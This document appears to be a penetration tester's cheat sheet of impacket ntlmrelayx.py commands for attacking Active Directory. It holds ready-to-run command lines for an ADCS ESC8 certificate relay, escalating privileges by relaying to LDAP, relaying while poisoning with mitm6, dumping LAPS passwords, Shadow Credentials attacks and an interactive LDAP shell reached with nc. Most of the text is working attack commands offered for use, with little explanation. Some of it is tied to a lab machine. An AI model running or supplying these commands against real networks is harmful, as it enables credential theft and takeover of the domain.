#
ntlmrelayx.py
ntlmrelay is part of impacket.
#
Logging output
ntlmrelayx YOUR-COMMANDS --output-file output.log
Need to revisit this - I think this only captures hashes
#
Relaying with ADCS ESC8 attack
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
#
Escalate privileges via relay
If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
#
Delegate access attack while poisoning with mitm6
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
#
Setup SOCKS relay to a list of hosts
In this example we have a targets.txt
file full of entries like this:
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
We setup the SOCKS relay like so:
ntlmrelayx.py -tf targets.txt -smb2support -socks
#
Dumping LAPS passwords
If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
#
Shadow Credentials attack
My favorite write-up on this attack is probably this one from GuidePoint security
#
Find hosts with WebClient running
The webclientservicescanner works well for this.
#
Add a rogue DNS record pointing to your machine
Try dnstool.py for this.
#
Setup relay for the Shadow Credentials attack
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
#
Trigger HTTP auth from VICTIMS
Head to our coercer page for more info.
#
Shadow Credentials attack (with LDAP shell)
I followed these instructions to pwn a HBT: Mist machine for this.
#
Get a venv setup
python3 -m venv venv
source venv/bin/activate
#
Install the appropriate impacket fork
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
#
Run ntlmrelayx with sudo permissions:
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -t ldap://ip.of.a.dc -i
#
Be ready to "catch" the relay
nc 127.0.0.1 11000